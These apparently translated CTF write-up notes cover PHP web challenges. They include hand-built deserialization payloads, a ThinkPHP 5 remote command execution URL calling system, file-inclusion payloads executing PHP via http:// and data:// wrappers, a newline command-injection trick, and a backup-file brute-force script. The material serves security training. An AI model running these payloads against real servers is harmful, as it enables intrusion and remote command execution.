Notes on PHP penetration test topics
2022-07-07 08:06:00 【Zeker62】
Contents
- The simplest deserialization vulnerability
- A trap question: PHP deserialization vulnerability
- PHP magic methods and when they run
- CTFHub - 2020 WangDing Cup: AreUSerialz
- Attack and Defense World: unserialize3
- Attack and Defense World: PHP2
- Attack and Defense World: favorite_number
- Attack and Defense World: Web_php_unserialize
- Attack and Defense World: php_rce
- Attack and Defense World: Web_php_include
- CTFHub: Website source code leak
- CTFHub: vim swap file leak
- CTFHub: .DS_Store leak
The simplest deserialization vulnerability
A simple example. Below is a short piece of PHP code; index.php includes the file flag.php:
<?php
// turn off error reporting
error_reporting(0);
include "flag.php";
$key="020202";
$str=$_GET['str'];
if(unserialize($str)==="$key"){
echo "$flag";
}
show_source(__FILE__);
// show_source() prints this file with syntax highlighting
?>
flag.php contains:
<?php
$flag="flag{020202020020}";
?>
Logic: the value of the str query parameter is unserialized and compared with "$key" using === (strict comparison: the type and the value must both match). If they are identical, the $flag loaded from flag.php is printed. A PHP string serializes as s:<byte length>:"<content>";, so the request is:
http://127.0.0.1/web/serialize/index.php?str=s:6:"020202";
If you are not sure what the serialized form of a value looks like, run serialize() on it locally or in an online PHP sandbox and copy the output:
<?php
$key=020202;
echo serialize($key);
?>
// i:8322;
Mind the type when doing this: in the snippet above the quotes were dropped, so 020202 is an octal integer literal (8322 in decimal) and serialize() emits i:8322; instead of s:6:"020202";. Because the check uses ===, an integer never matches the string $key; serialize the quoted value exactly as it appears in index.php.
A trap question: PHP deserialization vulnerability
The following CTF challenge is a deserialization trap:
<?php
error_reporting(0);
// hide error messages
include("flag.php");
$cookie=$_COOKIE['Bob'];
if(isset($_GET['hint'])){
show_source(__FILE__);
}elseif(unserialize($cookie)==="$key"){
echo "$flag";
}else{
$key="123456";
}
?>
The code reads the Bob cookie, unserializes it and compares the result with "$key"; if they are identical the flag is printed. There are two traps:
- If ?hint= is present in the query string, show_source() runs and the elseif branch is never reached. hint only exists to reveal the source; the comparison is evaluated only when hint is absent.
- Execution order: $key is assigned only in the else branch, which runs after the comparison has already failed. At the moment of the comparison $key is undefined, so "$key" interpolates to the empty string "".
The unserialize() result therefore has to be the empty string, so the cookie must carry the serialized empty string:
Cookie: Bob=s:0:"";
Send the value URL-encoded (Bob=s%3A0%3A%22%22%3B): a raw ; ends the cookie value, and unserialize() rejects s:0:"" without its closing semicolon.
PHP magic methods and when they run
__construct(): constructor, runs when an object is created with new (unserialize() does not call it)
__destruct(): destructor, runs when the last reference to the object goes away or at script shutdown
__call(): runs when an inaccessible or undefined method is called on an object
__callStatic(): the same, for a static call
__get(): runs when an inaccessible or undefined property is read
__set(): runs when an inaccessible or undefined property is written
__isset(): runs when isset() or empty() is used on an inaccessible property
__unset(): runs when unset() is used on an inaccessible property
__sleep(): called by serialize() before the object is serialized; returns the names of the properties to serialize
__wakeup(): called by unserialize() right after the object has been rebuilt
__serialize() / __unserialize() (PHP 7.4+): if defined, they take precedence over __sleep() / __wakeup()
__toString(): runs when the object is used as a string
__invoke(): runs when the object is called as a function
__set_state(): static method called when var_export() exports the object
__clone(): runs after the object has been copied with clone
__autoload(): formerly called when an undefined class was referenced (deprecated in PHP 7.2, removed in 8.0; use spl_autoload_register())
__debugInfo(): supplies the data var_dump() prints
Example
The following code shows the order in which these methods run:
<?php
error_reporting(0);
class ABC{
public $test;
function __construct(){
$this->test=1;
echo "The constructor is called<br>";
}
function __destruct(){
echo "Destructor called<br>";
}
function __wakeup(){
echo "The wake-up function was called<br>";
}
}
echo "Create object a<br>";
$a=new ABC();
echo "serialize<br>";
$a_ser=serialize($a);
echo "Deserialization<br>";
$a_unser=unserialize($a_ser);
echo "The object is dying<br>";
// Output:
// Create object a
// The constructor is called
// serialize
// Deserialization
// The wake-up function was called
// The object is dying
// Destructor called
// Destructor called
unserialize() does not run __construct(): it rebuilds the object from the string and then calls __wakeup(). Two objects now exist ($a and $a_unser), so __destruct() runs twice at script shutdown. This is what the challenges below rely on: the attacker controls the property values, the constructor never runs, and the destructor runs anyway.
CTFHub - 2020 WangDing Cup: AreUSerialz
<?php
include("flag.php");
highlight_file(__FILE__);
class FileHandler {
protected $op;
protected $filename;
protected $content;
function __construct() {
$op = "1";
$filename = "/tmp/tmpfile";
$content = "Hello World!";
$this->process();
}
public function process() {
if($this->op == "1") {
$this->write();
} else if($this->op == "2") {
$res = $this->read();
$this->output($res);
} else {
$this->output("Bad Hacker!");
}
}
private function write() {
if(isset($this->filename) && isset($this->content)) {
if(strlen((string)$this->content) > 100) {
$this->output("Too long!");
die();
}
$res = file_put_contents($this->filename, $this->content);
if($res) $this->output("Successful!");
else $this->output("Failed!");
} else {
$this->output("Failed!");
}
}
private function read() {
$res = "";
if(isset($this->filename)) {
$res = file_get_contents($this->filename);
}
return $res;
}
private function output($s) {
echo "[Result]: <br>";
echo $s;
}
function __destruct() {
if($this->op === "2")
$this->op = "1";
$this->content = "";
$this->process();
}
}
function is_valid($s) {
for($i = 0; $i < strlen($s); $i++)
if(!(ord($s[$i]) >= 32 && ord($s[$i]) <= 125))
return false;
return true;
}
if(isset($_GET{'str'})) { // curly-brace array access is the original challenge's code; deprecated in PHP 7.4, removed in 8.0
$str = (string)$_GET['str'];
if(is_valid($str)) {
$obj = unserialize($str);
}
}
Code logic:
- The str parameter is cast to a string and is_valid() checks that every byte is in the ASCII range 32 to 125; otherwise nothing is unserialized.
- unserialize($str) rebuilds a FileHandler without running __construct(). The class has no __wakeup(), so the next thing that runs is __destruct(), when the object is released at the end of the script.
- __destruct(): if op is exactly the string "2" (===), it is changed to "1"; content is emptied and process() is called.
- process() picks the branch with loose comparison (==): op == "1" writes, op == "2" reads the file named by filename and outputs it. Reading flag.php is the goal.
Solving it:
- unserialize() on attacker input means we build a serialized FileHandler ourselves.
- The destructor's check uses === while process() uses ==. A value that is not identical to "2" but loosely equal to it (the integer 2, or the numeric string " 2" with a leading space) survives the destructor and still reaches the read branch.
- The properties are protected. serialize() writes a protected name as "\0*\0op" (s:5:...), and the null bytes fail is_valid(). Since PHP 7.1 unserialize() ignores declared visibility, so a payload that names the properties as public (s:2:"op") still sets the protected ones. Generate it from a class with public properties (or strip the \0*\0 prefixes and fix the lengths by hand):
<?php
class FileHandler{
public $op=' 2'; // ' 2' !== "2", but ' 2' == "2"
public $filename="flag.php";
public $content="yzp";
}
$flag=new FileHandler();
$flag_1=serialize($flag);
echo $flag_1;
?>
The serialized string:
O:11:"FileHandler":3:{s:2:"op";s:2:" 2";s:8:"filename";s:8:"flag.php";s:7:"content";s:3:"yzp";}
Pass it as the str parameter in the URL (URL-encoded; the space in " 2" becomes %20).
Summary:
Strict versus loose comparison is a recurring way past PHP checks: == compares values after type juggling, while === requires the type and the value to be identical.
The calling order of the magic methods also has to be clear: unserialize() skips __construct(), calls __wakeup() if the class defines one, and __destruct() runs when the object is released.
Attack and Defense World: unserialize3
(The challenge source is shown as an image in the original post and is not reproduced here.)
Analysis:
- The code unserializes a parameter passed in the URL.
- The class defines __wakeup(), and if it is called the program exits.
Key points:
- unserialize() calls __wakeup() on every object it rebuilds.
- A malformed object can prevent __wakeup() from being called: when the declared property count is larger than the number of properties actually present, affected PHP versions (before 5.6.25 and before 7.0.10, CVE-2016-7124) skip __wakeup().
Generate the serialized string:
<?php
class xctf{
public $flag='111';
}
$flag=new xctf;
$str=serialize($flag);
echo $str;
?>
O:4:"xctf":1:{s:4:"flag";s:3:"111";}
Then change the property count from 1 to 2, so that it no longer matches the single property present:
O:4:"xctf":2:{s:4:"flag";s:3:"111";}
Passing this string yields the flag.
Attack and Defense World: PHP2
Directory brute-forcing turns up index.phps, which holds the source code of the challenge.
(The challenge source is shown as an image in the original post and is not reproduced here.)
Key points:
- PHP URL-decodes the query string once when it fills $_GET; this is done by the server, not by the browser.
- The code then calls urldecode() on the value a second time before the comparison.
- The value therefore has to be URL-encoded twice: after the first decode it is still %61%64%6d%69%6e (which is what any check before urldecode() sees), and only the second decode turns it into admin:
?id=%25%36%31%25%36%34%25%36%64%25%36%39%25%36%65
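The two decoding layers, as an added Python illustration that is not part of the original writeup. The challenge's own source is only shown as a screenshot in this post, so check_id() below is a hypothetical stand-in: a strict check on the once-decoded value PHP hands over in $_GET, followed by the application's own urldecode() and a loose check.

```python
from urllib.parse import unquote


def pct_encode_all(s: str) -> str:
    """Percent-encode every byte, including the unreserved characters."""
    return "".join("%%%02x" % b for b in s.encode())


def double_encode(s: str) -> str:
    """Encode twice: the server's query parsing undoes one layer, urldecode() the other."""
    return pct_encode_all(pct_encode_all(s))


def check_id(raw_query_value: str) -> dict:
    """Hypothetical model of the challenge (an assumption, not its real source):
    PHP decodes the raw query value once into $_GET['id']; a check on that value
    runs first; the application then calls urldecode() on it and checks again."""
    get_id = unquote(raw_query_value)     # what $_GET['id'] holds
    first_check = get_id == "admin"       # a check placed before urldecode() sees this
    decoded = unquote(get_id)             # the application's urldecode($_GET['id'])
    return {"get_id": get_id, "first_check": first_check, "decoded": decoded}


if __name__ == "__main__":
    payload = double_encode("admin")
    print(payload)
    print(check_id(payload))
```

double_encode("admin") produces exactly the id value used above; check_id() shows that the first comparison sees %61%64%6d%69%6e while the decoded value is admin.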
Attack and Defense World: favorite_number
(The challenge source is shown as an image in the original post and is not reproduced here.)
Key points:
- Array key overflow: on the affected PHP build the key 4294967296 (2^32) wraps around to 0, so stuff[0] and stuff[4294967296] refer to the same element, and the first filter can be passed with stuff[4294967296]=admin&stuff[1]=user. Whether this works depends on the target's PHP version; on a 64-bit PHP build 4294967296 is an ordinary integer key.
- The m modifier means multi-line mode: ^ and $ match at the start and end of every line, not only of the whole string. A check such as /^\d+$/m is satisfied as soon as one line consists only of digits, and whatever follows the newline is never matched against the pattern.
- %0a is the URL encoding of a line feed (\n), so a value such as num=6666%0als passes the numeric check and the part after the newline reaches the shell.
- The last filter is a blacklist of dangerous words. It can be sidestepped by addressing the flag file by inode instead of by name: list inodes with ls -i /, then read the file with tac `find / -inum <inode>`.
There are other ways to do it; search for them.
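An added Python illustration of the m-modifier pitfall, not from the original writeup. The challenge's regex is not shown in this post, so the ^\d+$ pattern is an assumption. Python's re.M behaves like PCRE's m modifier, and \A...\Z in Python corresponds to \A...\z in PCRE:

```python
import re

# Three ways of checking "is this value a number" with the same core pattern.
# The multi-line variant is what preg_match('/^\d+$/m', $num) in PHP does.
CHECKS = {
    "multiline": re.compile(r"^\d+$", re.M),  # ^ and $ match at every line boundary
    "plain": re.compile(r"^\d+$"),            # $ still matches before one trailing newline
    "strict": re.compile(r"\A\d+\Z"),         # anchored to the real ends of the string
}


def passes(value: str, check: str) -> bool:
    """True when the regex accepts the value (as preg_match() returning 1 would)."""
    return CHECKS[check].search(value) is not None


def classify(value: str) -> dict:
    """Run one input through all three checks."""
    return {name: passes(value, name) for name in CHECKS}


def shell_tail(value: str) -> str:
    """The part after the first newline: what reaches the shell when the value is
    dropped into a command line after the regex has "validated" it."""
    return value.split("\n", 1)[1] if "\n" in value else ""


if __name__ == "__main__":
    for sample in ("6666", "6666\n", "6666\nls", "ls"):
        print(repr(sample), classify(sample), "-> shell gets:", repr(shell_tail(sample)))
```

Only the strict form rejects both "6666\nls" and "6666\n". In PCRE, $ without the D modifier also accepts a trailing newline, so when a value must be exactly digits use \A...\z (or add the D modifier) and never rely on /m.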
Attack and Defense World: Web_php_unserialize
(The challenge source is shown as an image in the original post and is not reproduced here.)
Key points:
- A regular expression filters serialized objects (it looks for O:<digits>:). O:+4:"Demo" is still accepted by unserialize() but does not match, so it can replace O:4:"Demo".
- The input is base64-decoded, so the payload has to be base64-encoded.
- __wakeup() must not run. As in unserialize3, a property count larger than the real number of properties skips it (CVE-2016-7124): O:+4:"Demo":2:{s:10:"\0Demo\0file";s:8:"fl4g.php";}
Pitfall:
The file property is private. A private property is serialized with its name prefixed by \0Demo\0 (a null byte, the class name, another null byte), which is why the name is 10 bytes long (s:10) although "file" has 4 characters; a protected property gets the prefix \0*\0 instead. The null bytes are invisible when the string is printed, and pasting it into an online base64 tool usually loses them and breaks the payload. Generate and encode the whole thing in PHP instead:
<?php
class Demo{
private $file='fl4g.php';
}
$f=new Demo();
$b=serialize($f);
$b=str_replace('O:4', 'O:+4', $b); // dodge the O:<digits>: regex
$b=str_replace('1:{', '2:{', $b); // wrong property count: __wakeup() is skipped
echo base64_encode($b);
?>
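The three challenges above (AreUSerialz, unserialize3 and Web_php_unserialize) all come down to writing a serialized PHP object by hand with the right property-name prefixes and then tampering with it. The Python below is an added example written for this page, not code from any of the challenges or writeups; the PhpObject helper, the function names and the choice of the integer 2 for op in the AreUSerialz variant are this example's own. It keeps the payload as bytes so that the null bytes in private and protected names survive, which is the pitfall noted above.

```python
import base64
import re
from dataclasses import dataclass, field
from typing import Any, List, Tuple


@dataclass
class PhpObject:
    """A PHP object to serialize: class name plus (name, visibility, value) triples."""
    class_name: str
    props: List[Tuple[str, str, Any]] = field(default_factory=list)


def mangle(class_name: str, name: str, visibility: str) -> bytes:
    """Property name as serialize() writes it: public -> name,
    protected -> \\0*\\0name, private -> \\0ClassName\\0name."""
    if visibility == "public":
        return name.encode()
    if visibility == "protected":
        return b"\x00*\x00" + name.encode()
    if visibility == "private":
        return b"\x00" + class_name.encode() + b"\x00" + name.encode()
    raise ValueError(f"unknown visibility {visibility!r}")


def php_serialize(value: Any) -> bytes:
    """Subset of PHP's serialize(): null, bool, int, str/bytes, dict (array), PhpObject."""
    if value is None:
        return b"N;"
    if isinstance(value, bool):
        return b"b:%d;" % int(value)
    if isinstance(value, int):
        return b"i:%d;" % value
    if isinstance(value, str):
        value = value.encode()
    if isinstance(value, bytes):
        # the length is a byte count, which is why a mangled name reads s:10:"...file"
        return b's:%d:"%s";' % (len(value), value)
    if isinstance(value, dict):
        body = b"".join(php_serialize(k) + php_serialize(v) for k, v in value.items())
        return b"a:%d:{%s}" % (len(value), body)
    if isinstance(value, PhpObject):
        body = b"".join(
            php_serialize(mangle(value.class_name, name, vis)) + php_serialize(v)
            for name, vis, v in value.props
        )
        cls = value.class_name.encode()
        return b'O:%d:"%s":%d:{%s}' % (len(cls), cls, len(value.props), body)
    raise TypeError(f"cannot serialize {type(value).__name__}")


def bump_property_count(ser: bytes, extra: int = 1) -> bytes:
    """Declare more properties than are present: on PHP before 5.6.25 / 7.0.10
    (CVE-2016-7124) unserialize() then skips __wakeup() for that object."""
    m = re.match(rb'O:\+?\d+:"[^"]*":(\d+):\{', ser)
    if not m:
        raise ValueError("not a serialized object")
    return ser[: m.start(1)] + str(int(m.group(1)) + extra).encode() + ser[m.end(1):]


def dodge_object_regex(ser: bytes) -> bytes:
    """O:+4:"Demo" is still parsed by unserialize(), but a filter on O:<digits>: misses it."""
    return ser.replace(b"O:", b"O:+", 1)


def is_valid(s: bytes) -> bool:
    """Mirror of AreUSerialz's is_valid(): every byte must be between 32 and 125."""
    return all(32 <= b <= 125 for b in s)


def areuserialz_payload() -> bytes:
    """Public names carry no null-byte prefix, so the string passes is_valid(); since
    PHP 7.1 unserialize() ignores declared visibility and still fills the protected
    properties. op is the integer 2: 2 === "2" is false (the destructor leaves it),
    2 == "2" is true (process() takes the read branch)."""
    fh = PhpObject("FileHandler", [
        ("op", "public", 2),
        ("filename", "public", "flag.php"),
        ("content", "public", ""),
    ])
    return php_serialize(fh)


def web_php_unserialize_raw() -> bytes:
    """Private property (null bytes kept), regex dodge, then a wrong property count."""
    demo = PhpObject("Demo", [("file", "private", "fl4g.php")])
    return bump_property_count(dodge_object_regex(php_serialize(demo)))


def web_php_unserialize_payload() -> str:
    """base64 of the raw payload, ready for the challenge's base64_decode()."""
    return base64.b64encode(web_php_unserialize_raw()).decode()


if __name__ == "__main__":
    print(areuserialz_payload().decode())   # paste as str= (URL-encode it)
    print(web_php_unserialize_raw())         # null bytes shown as \x00
    print(web_php_unserialize_payload())
```

bump_property_count() applied to the xctf object from unserialize3 gives the same O:4:"xctf":2:{...} string as editing the count by hand, and the raw Web_php_unserialize payload printed by this script shows the \x00 bytes that a browser or web tool silently drops.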
Attack and Defense World: php_rce
Approach:
- Scanning with dirsearch and Yujian (御剑) turns up robots.txt, but there is nothing useful in it.
- The site runs ThinkPHP 5. Searching for known vulnerabilities in that framework turns up a remote command execution bug; the payload used is:
http://your-ip:8080?s=index/\think\app/invokefunction&function=call_user_func_array&vars[0]=system&vars[1][]=[your-cmd]
Exploitation:
(The screenshots of the exploitation steps in the original post are not reproduced here.)
Attack and Defense World: Web_php_include
(The challenge source is shown as an image in the original post and is not reproduced here.)
Key points:
- The php:// wrapper is stripped from the input, so the php:// pseudo-protocol cannot be used.
- Find the flag file and include it.
Solution 1: SSRF plus file inclusion
- The page parameter is passed to include. The hello parameter is only echoed back, so PHP code sent to hello directly is printed, not executed.
- Make page include the site's own index.php over HTTP: http://127.0.0.1/index.php
- Pass hello=<?system('ls');?> (written with the short <? ?> tags, without php) to that inner request: the echoed value becomes part of the included response and is executed, listing the directory and revealing the flag file.
- Finally read the flag file the same way.
Payloads:
http://your-ip:8080?page=http://127.0.0.1/index.php?hello=<?system('ls');?>
http://your-ip:8080?page=http://127.0.0.1/index.php?hello=<?show_source('fl4gisisish3r3.php');?>
Solution 2: the data://text/plain pseudo-protocol (needs allow_url_include=On)
Print the document root:
http://111.200.241.244:58702/?page=data://text/plain,<?php echo $_SERVER['DOCUMENT_ROOT'];?>
Print the files in the current directory:
http://111.200.241.244:58702/?page=data://text/plain,<?php print_r(scandir('/var/www'));?>
Print the source of the flag file:
http://111.200.241.244:58702/?page=data://text/plain,<?php show_source('fl4gisisish3r3.php');?>
The code can also be passed base64-encoded; a + in the base64 output has to be URL-encoded as %2b:
http://111.200.241.244:58702/?page=data://text/plain;base64,PD9waHAgc2hvd19zb3VyY2UoJ2ZsNGdpc2lzaXNoM3IzLnBocCcpOz8%2b

CTFHub: Website source code leak
Brute-force the usual backup archive names with a script:
import requests

url = "http://challenge-7e05b5df83247052.sandbox.ctfhub.com:10800"
names = ['web', 'website', 'backup', 'back', 'www', 'wwwroot', 'temp']
exts = ['.tar', '.tar.gz', '.zip', '.rar']

for name in names:
    for ext in exts:
        url_test = f"{url}/{name}{ext}"
        print(url_test)
        r = requests.get(url_test, timeout=10)
        # the archive comes back with 200; a missing file gives a 404 page
        if r.status_code == 200 and '404' not in r.text[:500]:
            print(f"[+] found {url_test} ({len(r.content)} bytes)")
CTFHub: vim swap file leak
When a file such as index.php is edited with vim, a swap file .index.php.swp (note the leading dot) is left behind if vim is not closed cleanly, and it can be downloaded from the web root.
Recover the file from the swap file:
vim -r .index.php.swp
CTFHub: .DS_Store leak
.DS_Store is a hidden file that macOS creates to store custom attributes of a folder. It records the names of the files in that directory, so a leaked .DS_Store reveals the complete file list.
Usage: on Linux it can simply be read with cat (or strings) to see the file names.
Tool: ds_store_exp https://github.com/lijiejie/ds_store_exp
It parses .DS_Store files recursively and downloads the files they list; it is a Python 2 script.